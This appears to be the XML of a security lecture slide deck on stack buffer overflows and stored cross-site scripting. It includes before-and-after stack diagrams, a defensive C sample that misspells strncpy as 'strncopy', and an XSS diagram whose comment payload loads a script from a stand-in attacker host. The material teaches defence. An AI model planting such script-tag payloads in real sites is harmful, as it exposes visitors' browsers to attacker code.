              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>frames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533400" y="2299318"/>
            <a:ext cx="228600" cy="182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dirty="0" smtClean="0"/>
              <a:t>Current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>frame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914400" y="685800"/>
            <a:ext cx="1828800" cy="1600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" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2299318"/>
            <a:ext cx="1828800" cy="3048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return address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="2604118"/>
            <a:ext cx="1828800" cy="762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/>
              <a:t>buff[100]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="3366118"/>
            <a:ext cx="1828800" cy="74868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3" name="Rectangle 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="4557583"/>
            <a:ext cx="1828800" cy="136967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program code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Rectangle 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="533400" y="4557583"/>
            <a:ext cx="228600" cy="14381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dirty="0" smtClean="0"/>
              <a:t>Another frame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228600" y="6234702"/>
            <a:ext cx="2895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BEFOR ATTACK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6324600" y="594042"/>
            <a:ext cx="1981200" cy="5410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019800" y="609918"/>
            <a:ext cx="2286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dirty="0" smtClean="0"/>
              <a:t>Previous</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>frames</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="2299636"/>
            <a:ext cx="228600" cy="182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dirty="0" smtClean="0"/>
              <a:t>Current</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="686118"/>
            <a:ext cx="1828800" cy="1600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Malicious code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="2283760"/>
            <a:ext cx="1828800" cy="3048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new return address</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="2588560"/>
            <a:ext cx="1828800" cy="762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/>
              <a:t>buff[100]</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="3350560"/>
            <a:ext cx="1828800" cy="74868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3" name="Rectangle 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6400800" y="4542025"/>
            <a:ext cx="1828800" cy="136967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program code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6019800" y="4542025"/>
            <a:ext cx="228600" cy="14381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dirty="0" smtClean="0"/>
              <a:t>Another frame</a:t>
            </a:r>
            <a:endParaRPr lang="en-US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5715000" y="6219144"/>
            <a:ext cx="2895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AFTER ATTACK</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Curved Left Arrow 25"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2791727" y="2362200"/>
            <a:ext cx="637273" cy="3137518"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLef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urved Up Arrow 26"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="16200000">
            <a:off x="7793255" y="1453096"/>
            <a:ext cx="1676400" cy="567891"/>
          </a:xfrm>
          <a:prstGeom prst="curvedUp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57600" y="898841"/>
            <a:ext cx="2133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Attacker knows the exact position of the return address.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Attacker constructs an input big enough to overflow buffer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Attacker inserts new return address that points to malicious code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545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 animBg="1"/>
      <p:bldP spid="27" grpId="0" animBg="1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>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Challenges of seizing control of execution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43000"/>
            <a:ext cx="7467600" cy="5330952"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The address space of a given process is unpredictable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The address space may change depending of which machine the program is running</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Guessing the location of the return address can be challenging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Determining the address of the malicious code in the memory is also challenging</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attackers have developed several techniques to overcome these challenges: NOP sledding, return-to-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>libc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>, jump-to-register, trampoline.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98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9762"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Protection against buffer overflow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219200"/>
            <a:ext cx="7543800" cy="5254752"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Buffer overflow vulnerability is caused by poor programming</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Programmers need to be trained about insecure programming practices</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Some languages such as Java do not allow behaviors that make buffer overflow possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The function </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>strncopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>() is safer because it checks the size of the buffer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657600" y="3425952"/>
            <a:ext cx="4343400" cy="33528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400" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>tdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>, char * </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[])</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>      //create a buffer on the stack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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t> buff[100];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" smtClean="0"/>
              <a:t>//Only copies as much of the argument as can fit in the buffer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncopy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>[1], </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(buff));</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0"/>
              <a:t>//Print the content of the buffer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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1" smtClean="0"/>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" smtClean="0"/>
              <a:t>(“%s\n”, buff);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return 1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0"/>
              <a:t>}</a:t>
            </a:r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28592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/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS (Cross Site Scripting) Attack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7467600" cy="5178552"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cross-site scripting (XSS) is a code injection attack that allows an attacker to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>inject a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>into a webserver.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>JavaScript is then executed  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>in another user's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>browser whenever the user accesses the website.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Most frequent targets are websites that allow users to share content, such as blog, social network etc. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0"/>
              <a:t>Vulnerability exploited:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Website design that does not verify whether an HTTP request  contains any </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> code or not.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="114995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Attack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/>
              <a:t>perpetrator discovers a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>vulnerability in an e-commerce website </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>that allows HTML tags to be embedded in the site’s comments section.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embedded tags become a permanent feature of the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Every time the page is opened, the browser parses the malicious script along with rest of the code.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The script is executed.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217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Best Practice: Defense in Depth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2" y="1828805"/>
            <a:ext cx="5145915" cy="381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" y="2743241"/>
            <a:ext cx="320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</a:rPr>
              <a:t>Manage risk with diverse defensive strategies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</a:rPr>
              <a:t>Avoid single point of failure</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344112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70457"/>
            <a:ext cx="7886700" cy="467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Attack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7963" y="1518337"/>
            <a:ext cx="2094470" cy="126038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350" dirty="0"/>
              <a:t>Attacker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35925" y="1876685"/>
            <a:ext cx="1958546" cy="25331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350" dirty="0"/>
              <a:t>Attacker browser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35925" y="2222672"/>
            <a:ext cx="1958546" cy="46337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350" dirty="0"/>
              <a:t>Attacker Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4721827" y="1373146"/>
            <a:ext cx="2438918" cy="194927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1350" dirty="0"/>
              <a:t>http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1350" dirty="0" smtClean="0"/>
              <a:t>://amazone.com </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1350" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4818855" y="1659342"/>
            <a:ext cx="2323074" cy="73851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750" b="1" dirty="0" smtClean="0"/>
              <a:t>COMMENT: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0" smtClean="0"/>
              <a:t>The price is too high. You can get the same product in cheaper price here  &lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0" smtClean="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'http://hackerssite.com/dangerous.js’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rectangle 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4769709" y="2552321"/>
            <a:ext cx="2323074" cy="6156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z="750" b="1"/>
              <a:t>print "&lt;html&gt;"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="750" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="750" b="1"/>
              <a:t>print "Latest comment:"</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="750" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="750" b="1"/>
              <a:t>print database.latestComment</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="fr-FR" sz="750" b="1"/>
            </a:br>
            <a:r>
              <a:rPr lang="fr-FR" sz="750" b="1"/>
              <a:t>print "&lt;/html&gt;"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="750" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Right Arrow 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1884406" y="1871602"/>
            <a:ext cx="2940908" cy="24713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 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2384854" y="1573942"/>
            <a:ext cx="1952368" cy="2976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50" dirty="0"/>
              <a:t>Attacker sends </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>a comment with a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0"/>
              <a:t>malicious script</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Curved Left Arrow 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7174641" y="2038419"/>
            <a:ext cx="420130" cy="888589"/>
          </a:xfrm>
          <a:prstGeom prst="curvedLef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07075" y="4088542"/>
            <a:ext cx="2755557" cy="168669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350" dirty="0"/>
              <a:t>Victim</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Bent-Up Arrow 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3762632" y="3322423"/>
            <a:ext cx="2755557" cy="1609468"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 6190"/>
              <a:gd name="adj2" fmla="val 10988"/>
              <a:gd name="adj3" fmla="val 32678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Rectangle 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4233733" y="4999852"/>
            <a:ext cx="1813355" cy="33414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50" dirty="0"/>
              <a:t>Victim requests a webpage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962657" y="4458145"/>
            <a:ext cx="2167067" cy="3192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50" dirty="0"/>
              <a:t>GET http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
              <a:t>://amazone.com/latest-comment</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1041057" y="4458146"/>
            <a:ext cx="2699951" cy="108849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750" b="1" dirty="0"/>
              <a:t>Requested webpage:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t>&lt;html&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t>Latest Comment:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0" smtClean="0"/>
              <a:t>script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t>=</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'http://hackerssite.com/dangerous.js’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="750" b="1" dirty="0"/>
              <a:t>&lt;/html&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Bent-Up Arrow 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000" flipV="1">
            <a:off x="3966081" y="2853309"/>
            <a:ext cx="2527837" cy="3144796"/>
          </a:xfrm>
          <a:prstGeom prst="bentUpArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4516"/>
              <a:gd name="adj2" fmla="val 4926"/>
              <a:gd name="adj3" fmla="val 21176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Left Arrow 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="4207613">
            <a:off x="517916" y="3324997"/>
            <a:ext cx="1469104" cy="201061"/>
          </a:xfrm>
          <a:prstGeom prst="leftArrow">
            <a:avLst>
              <a:gd name="adj1" fmla="val 50000"/>
              <a:gd name="adj2" fmla="val 199230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Rectangle 23"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1323520" y="3107399"/>
            <a:ext cx="2622725" cy="3192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50" dirty="0"/>
              <a:t>GET </a:t>
            </a:r>
